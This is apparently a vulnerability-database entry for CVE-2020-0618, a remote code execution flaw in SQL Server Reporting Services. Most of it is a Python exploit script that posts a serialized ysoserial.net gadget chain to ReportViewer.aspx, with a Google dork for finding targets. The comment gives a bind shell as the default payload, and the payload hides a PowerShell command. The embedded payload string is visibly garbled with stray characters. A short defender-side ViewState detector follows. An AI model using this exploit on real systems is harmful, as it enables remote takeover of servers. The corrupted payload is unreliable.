Microsoft SQL Server and Microsoft SQL Server Reporting Services Security Vulnerability

Vulnerability ID: 1926764   Vulnerability type: Input validation error
Published: 2020-09-18   Updated: 2020-09-18
CVE ID: CVE-2020-0618

CNNVD ID: CNNVD-202002-496
Platform: N/A   CVSS score: N/A
Source
https://cxsecurity.com/issue/WLB-2020090085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202002-496
Details
Microsoft SQL Server Reporting Services (SSRS) is a server-based reporting platform from Microsoft that supports creating, deploying and managing mobile and paginated reports.
A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services; it is caused by the program handling page requests incorrectly. An attacker can exploit this vulnerability to execute code on the system. The following products and versions are affected: Microsoft SQL Server 2012, Microsoft SQL Server 2014 Service Pack 3, Microsoft SQL Server 2016.
Exploit (EXP)
# Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
# Google Dork: inurl:ReportViewer.aspx
# Date: 2020-09-17
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR),
# Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL
# Server 2012 32-bit/x64 SP2 (QFE)
# Tested on: Windows 2016
# CVE : CVE-2020-0618
# Credit goes to Soroush Dalili
# Source:
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
# https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
#!/usr/bin/python
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
import argparse, requests, logging
from bs4 import BeautifulSoup
from sys import argv, exit, stderr, stdout

# to create a payload (default is bindshell on 0.0.0.0:65535):
# .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..."


class Exploit:
    # LosFormatter-serialized gadget chain produced by the ysoserial.net command above (base64)
payload = '/wEy4hYAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3Ri e ] # 0 ( A tlbSwg, B A e o g ] MVmVyc2lvbj00LjAuMC4^ q  x N BwLc m = { w # 0  oCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQ- r c WBU3lzdGVtLkNvbGxw `  mlY3Rpb25zLkdlbmVya$ g U I _ ^ % WMuU29ydGVkU; H 1  z 0 r2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAE , . WsIEN1bHR1cmU9bmV1dHJhbCwgUL R { K - qHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVC 1 M Y S W `Db3VudAhDb21wYXJlcgdWZXJzaW9uBUlK f ! ] v n h K P0ZW1zAAMABgiNAVN5c3RlbS5Db2x( G 4 Y V csZWN0aW9ucy5HZW5lcmljLkNvbXB| C c 7hcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2Nvcmxg y ` ` 6 L lpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgV 0 - I i o 9CAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4c W )wLCBDdWx0dXJlPW5ldXRyYWwsIFBI V , F c T 01YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWe } & G ~ D YxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBj d } 2 X b p yQAAABEEAAAAAgAAAAYGAAAAqAUv, F UYyBwb3dlcnNoZWx5 w p / 0 g ; I 1sLmV4ZSAtZx  # Q mXhlYyBieXBhc3MgLW5vbmludGVyYWN` b & H =0aXZlIC1ub2V4a ! P d 1 jXQgLXdpbmRvd3NY = a0eWxlIGhpZGRlbiA_ Q * 7 {tYyBpZXgoW3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6ZGVmYXVsdC5nZXRzdHJpbmcoW3N5cO c . 
!3R[ x K r # flbS5jb252ZXJ0XTo6ZnJvbWJhc2U2NHN0cmluZygnSkdFOVczTjVjM1JsYlM1dVx 6 g )pYUXVjMjlqYTJWMGN5NTBZMv c L $ M E C * C0JzYVhOMFpXNWxjbDAyTlRVek5Uc2tZUzV6ZEdGeWRDZ3BPeVJqUFNSaExtRmpZMlZ3ZEhSamNHTnNhV1Z1ZENncE95UmxQU1JqTD $ r  D `G1kbGRITjBjbVZoYlNncE8xdGllWFJsVzExZEpHYzlNQzR1TmpVMU16VjhKWHN3ZlR` e T y y w c0M2FHbHNaU2dvSkdnOUpHVXVjbVZoWkNna1pz @ J , Y ]5d3dMQ1JuTG14bGJtZDBhQ2twTFc1bElEQXBleVJzUFNodVpYY3RiMkpxWldOMElDMTBlWEJsYm1GdFpTQnplWE4wWlcwdWRHVjRkQzVoYzJ; 3 IOcGFXVnVZMjlrYVc1bktTNW5aWFJ6ZEhKcGJtY29KR2NzTUN3a2FDazdKRzQ5S0dsbGVDQWtiQ0F5UGlZeGZHOTFkQzF6ZEhKcGJtY3BPeVJ3UFNJa0tDUnVLU1FvS0hCM1pDa3VjR0YwYUNrK0lqc2tjVDBvVzNSbGVIUXVaVzVqYjJScGJtZGRPanBoYzJOcGFTa3VaMlYwWW5sMFpYTW9KSEFwT3lSbExuZHlhWFJsS0NSeExEQXNKSEV1YkdWdVozUm9LVHNrWlM1bWJIVnphQ2dwZlRza1l5NWpiRzl6WlNncE95UmhMbk4wYjNBb0tUc05DZz09JykpKQYHAAAAA2NtZAQFAAAb [ ) N ? 2 (AIlN6 1 F + l = g5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMo - K W p ^ E BDAzBTeXN0ZW0uRGVsZWdhdGVTZ; g nXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY33 + J kRb e _ /pb24uTWVtYmVySW5m; ] 4 F S v q 7b1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLl| j + ` SJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXR) k J U ` # C mpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYX/ = *RlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkY V @ T x ?GdGFyZ2 y L # c e k A2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5u K O 1 a u U @EZWxlZ2F0ZVNlcmlhbGl6YXRpb25V x F y a t M E ^Ib2xkZXIrRGVsZWdhdGVR / c ^ t ! 4FbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaZ ? p f [ [ . # -W5nLCBtc2N0 b B [ rvcmxp A g - s | 9pYiwgVmVyc2lvbJ w A 5 . n kj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBg n | o [tc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI! q G n n  L d f3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RC ] apY3MuUHJvY2U 0 R 5 d GVzcywgF ? 
f AU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHV! 2 QibGljS2V5VG9rZWO ? X49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4Q d b , u - kwLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbv A 5 p *j1iNh q . L v 1 a Y %zdhNWM1NjE5MzRlMDg5CgYNAAAASVNS A e n ] u5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1Ymxe F r [ C M 9pY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGl3 s X !  # IvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ254 @ g g _ i h i [hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJP ~ NpY0FyZ: 0 . o3VtZW50cwEBA@ 1 # @QEBAAMIDVN5c3Rl4 & 5 } &bS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3M6 . O 3uUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5B d } tnLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9/ k X c :zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAA6 o 2 1 ; yAAoBCgAAAAkAAAAI D h w @ |GFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZWb q M # ? N D b %0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcc q  ? n M + GGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJU . D SlPW5a * = . ` H ] !ldXRy~ @ h 7 = UYWwsIX { + k 6 i pFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL'
    timeout = 0.5
    cookies = {}
    params = {}

    def __init__(self, opt):
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (opt.domain, opt.username)
        self.target = '%s%s' % (opt.target, opt.path)
        self.password = opt.password
        self.session = requests.session()
        self.redirect = opt.redirect
        self.proxies = {
            'http': 'http://%s' % opt.proxy,
            'https': 'http://%s' % opt.proxy
        } if opt.proxy != '' else {}
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        # the three form fields ReportViewer.aspx expects; the serialized object goes in
        # NavigationCorrector$ViewState, which the vulnerable page deserializes
        self.form = {
            '__VIEWSTATE': '',
            'NavigationCorrector$PageState': 'NeedsCorrection',
            'NavigationCorrector$ViewState': self.payload
        }
        if opt.debug:
            self.debug()

    def info(self, message):
        stdout.write('[+] %s\n' % str(message))
        return self

    def error(self, message):
        stderr.write('[-] error: %s\n' % str(message))
        return self

    def doGet(self, url, params=None, values=None):
        self.info('sending get request to %s' % url)
        try:
            # NTLM authentication is only attached when a domain\username was supplied
            return self.session.get(
                url=url,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                data=values,
                params=params,
                auth=HttpNtlmAuth(self.username, self.password)
            ) if self.username != '\\' else self.session.get(
                url=url,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                data=values,
                params=params
            )
        except Exception as err:
            self.error(err)

    def doPost(self, url, values=None, params=None):
        self.info('sending post request to %s' % url)
        try:
            return self.session.post(
                url=url,
                data=values,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                params=params,
                auth=HttpNtlmAuth(self.username, self.password)
            ) if self.username != '\\' else self.session.post(
                url=url,
                data=values,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                params=params
            )
        except Exception as err:
            self.error(err)

    def parsePage(self, content):
        # copy every <input name=... value=...> from the page into the form to be posted
        self.info('parsing form values')
        soup = BeautifulSoup(content, 'lxml')
        for tag in soup.select('input'):
            try:
                self.form[tag['name']] = tag['value']
            except Exception as err:
                self.error(err)
        return self

    def debug(self):
        # turn on wire-level logging for http.client / urllib3
        self.info('debugging enabled')
        try:
            import http.client as http_client
        except ImportError:
            import httplib as http_client
        http_client.HTTPConnection.debuglevel = 1
        logging.basicConfig()
        logging.getLogger().setLevel(logging.DEBUG)
        requests_log = logging.getLogger("requests.packages.urllib3")
        requests_log.setLevel(logging.DEBUG)
        requests_log.propagate = True
        return self

    def getForm(self):
        self.info('retrieving form values')
        resp = self.doGet(url=self.target)
        self.parsePage(content=resp.content)
        return self

    def exploit(self):
        self.info('exploiting target')
        resp = self.doPost(url=self.target, params=self.params,
                           values=self.form)
        self.info('received response %d' % resp.status_code)
        return self


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='CVE-2020-0618 SQL Server Reporting Services ViewState Deserialization exploit',
        add_help=True
    )
    try:
        parser.add_argument('-target', action='store', help='Target address: http(s)://target.com ')
        parser.add_argument('-username', action='store', default='',
                            help='Username to use: first.last')
        parser.add_argument('-domain', action='store', default='',
                            help='User domain to use: domain.local')
        parser.add_argument('-password', action='store', default='',
                            help='Password to use: Summer2020')
        parser.add_argument('-debug', action='store', default=False,
                            help='Enable debugging: False')
        parser.add_argument('-redirect', action='store',
                            default=False, help='Follow redirects: False')
        parser.add_argument('-proxy', action='store', default='',
                            help='Enable proxy: 10.10.10.10:8080')
        parser.add_argument('-path', action='store',
                            default='/ReportServer/pages/ReportViewer.aspx', help='Path to page')
        if len(argv) == 1:
            parser.print_help()
            exit(1)
        options = parser.parse_args()
        Exploit(opt=options).exploit()
    except Exception as error:
        stderr.write('[-] error in main %s\n' % str(error))
Regards,
West Shepherd
OSWE  OSCE  OSCP  OSWP  CEH  Security+
West Lee Shepherd, LLC
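As an added defender-side example (not part of the advisory above and not the exploit author's code), the following Python inspects a form-urlencoded POST body of the kind the exploit sends. A LosFormatter/ViewState value is an ObjectStateFormatter stream that starts with the header bytes 0xFF 0x01 followed by a token byte; the payload above begins with "/wEy", which base64-decodes to FF 01 32, and 0x32 is ObjectStateFormatter's Token_BinarySerialized, the token that hands the remainder of the stream to BinaryFormatter. The check flags any NavigationCorrector$ViewState or __VIEWSTATE value whose top-level token is that one. The two sample bodies, the helper names and the suspicious blob (a header plus filler bytes, not a gadget chain) are constructed for this example.

```python
import base64
from urllib.parse import parse_qs, urlencode

# ObjectStateFormatter stream layout (the serializer behind LosFormatter / ViewState):
# two header bytes, then a token byte that says how the next value is encoded.
MARKER_FORMAT = 0xFF
MARKER_VERSION_1 = 0x01
TOKEN_STRING = 0x05
TOKEN_PAIR = 0x0F
TOKEN_BINARY_SERIALIZED = 0x32   # value is passed to BinaryFormatter: the dangerous case
TOKEN_NULL = 0x64

# form fields that ReportViewer.aspx feeds to LosFormatter (names taken from the exploit above)
SUSPECT_FIELDS = ('NavigationCorrector$ViewState', '__VIEWSTATE')


def decode_viewstate(value):
    """Base64-decode a ViewState value, tolerating stripped '=' padding; None if undecodable."""
    try:
        padded = value + '=' * (-len(value) % 4)
        return base64.b64decode(padded)
    except (ValueError, TypeError):
        return None


def classify_viewstate(blob):
    """Classify a decoded blob by its header bytes and top-level token."""
    if blob is None or len(blob) < 3:
        return 'invalid'
    if blob[0] != MARKER_FORMAT or blob[1] != MARKER_VERSION_1:
        return 'not-objectstateformatter'
    if blob[2] == TOKEN_BINARY_SERIALIZED:
        return 'binary-serialized'
    return 'plain'


def inspect_post_body(body):
    """Return (field, classification) for every non-empty suspect field in a form-urlencoded body."""
    fields = parse_qs(body, keep_blank_values=True)
    findings = []
    for name in SUSPECT_FIELDS:
        for value in fields.get(name, []):
            if value:
                findings.append((name, classify_viewstate(decode_viewstate(value))))
    return findings


def is_suspicious(body):
    """True when any ViewState-style field carries a BinaryFormatter-serialized object."""
    return any(kind == 'binary-serialized' for _, kind in inspect_post_body(body))


def make_sample_bodies():
    """Constructed sample request bodies: one ordinary, one carrying a BinarySerialized token."""
    # Pair(String "abc", Null): the shape of harmless ViewState
    benign = (bytes([MARKER_FORMAT, MARKER_VERSION_1, TOKEN_PAIR, TOKEN_STRING, 3])
              + b'abc' + bytes([TOKEN_NULL]))
    # header + BinarySerialized token + filler bytes; no gadget chain, only the marker a detector keys on
    suspicious = bytes([MARKER_FORMAT, MARKER_VERSION_1, TOKEN_BINARY_SERIALIZED]) + b'\x00\x01\x00\x00\x00'
    benign_body = urlencode({
        '__VIEWSTATE': base64.b64encode(benign).decode(),
        'NavigationCorrector$PageState': 'NeedsCorrection',
        'NavigationCorrector$ViewState': '',
    })
    suspicious_body = urlencode({
        '__VIEWSTATE': '',
        'NavigationCorrector$PageState': 'NeedsCorrection',
        'NavigationCorrector$ViewState': base64.b64encode(suspicious).decode(),
    })
    return benign_body, suspicious_body


if __name__ == '__main__':
    for body in make_sample_bodies():
        print(is_suspicious(body), inspect_post_body(body))
```

A check like this is cheap to run in a reverse proxy or WAF in front of /ReportServer/ and in request-body captures when triaging. It only looks at the top-level token, so a BinarySerialized value nested inside a Pair or Triplet is not caught; the durable fix is the vendor update referenced below.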
References

Source: portal.msrc.microsoft.com

Link: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618

Source: portal.msrc.microsoft.com

Link: https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2020-0618

Source: nvd.nist.gov

Link: https://nvd.nist.gov/vuln/detail/CVE-2020-0618